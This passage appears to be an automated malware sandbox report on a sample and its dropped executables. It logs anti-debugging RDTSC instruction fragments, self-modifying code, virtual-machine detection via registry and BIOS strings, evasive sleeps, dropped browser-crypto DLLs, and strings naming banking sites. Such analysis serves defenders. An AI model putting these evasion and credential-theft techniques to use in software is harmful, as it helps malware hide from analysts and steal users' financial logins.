Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10DE3 second address: 4C10E0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F73D4D0E052h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73D4D0E04Eh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10E0E second address: 4C10E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10E14 second address: 4C10E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov si, bx 0x0000000d pushfd 0x0000000e jmp 00007F73D4D0E04Bh 0x00000013 or si, 931Eh 0x00000018 jmp 00007F73D4D0E059h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F73D4D0E058h 0x00000028 and ax, 8048h 0x0000002d jmp 00007F73D4D0E04Bh 0x00000032 popfd 0x00000033 popad 0x00000034 push dword ptr [ebp+0Ch] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10E84 second address: 4C10E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10E9F second address: 4C10EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73D4D0E058h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10EDB second address: 4C10EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10EDF second address: 4C10EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10F31 second address: 4C10F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10F41 second address: 4C10F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10F45 second address: 4C10F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73D4C5760Ah 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC0550 second address: 4BC059C instructions: 0x00000000 rdtsc 0x00000002 call 00007F73D4D0E054h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F73D4D0E050h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F73D4D0E050h 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F73D4D0E04Ah 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC059C second address: 4BC05AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC05AB second address: 4BC0602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007F73D4D0E04Eh 0x00000010 call 00007F73D4D0E049h 0x00000015 jmp 00007F73D4D0E050h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F73D4D0E04Eh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC0602 second address: 4BC061B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC061B second address: 4BC061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC061F second address: 4BC0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC0631 second address: 4BC0676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F73D4D0E059h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F73D4D0E053h 0x0000001d rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Special instruction interceptor: First address: 9CB602 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Special instruction interceptor: First address: 9F3DA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Special instruction interceptor: First address: 9DCA32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Special instruction interceptor: First address: A5DCCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: FAB602 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: FD3DA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: FBCA32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 103DCCD instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Code function: 8_2_04C10D9B rdtsc 8_2_04C10D9B
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 553 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 8069 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1931 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1055 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1061 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 406 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1119 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1097 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1086 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Window / User API: threadDelayed 735 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 3520 Thread sleep count: 553 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6308 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3260 Thread sleep count: 1055 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3260 Thread sleep time: -2111055s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5344 Thread sleep count: 1061 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5344 Thread sleep time: -2123061s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3200 Thread sleep count: 406 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3200 Thread sleep time: -12180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7244 Thread sleep time: -900000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2832 Thread sleep count: 1119 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2832 Thread sleep time: -2239119s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 380 Thread sleep count: 219 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 380 Thread sleep time: -438219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2524 Thread sleep count: 1097 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2524 Thread sleep time: -2195097s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4092 Thread sleep count: 1086 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4092 Thread sleep time: -2173086s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe TID: 7296 Thread sleep count: 735 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C9CC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: BAEBFIIE.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: BAEBFIIE.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: BAEBFIIE.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000B.00000002.2370774596.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2659743928.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3262920684.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.3864077697.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000012.00000002.4462386574.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: BAEBFIIE.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: BAEBFIIE.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: BAEBFIIE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BAEBFIIE.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BAEBFIIE.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
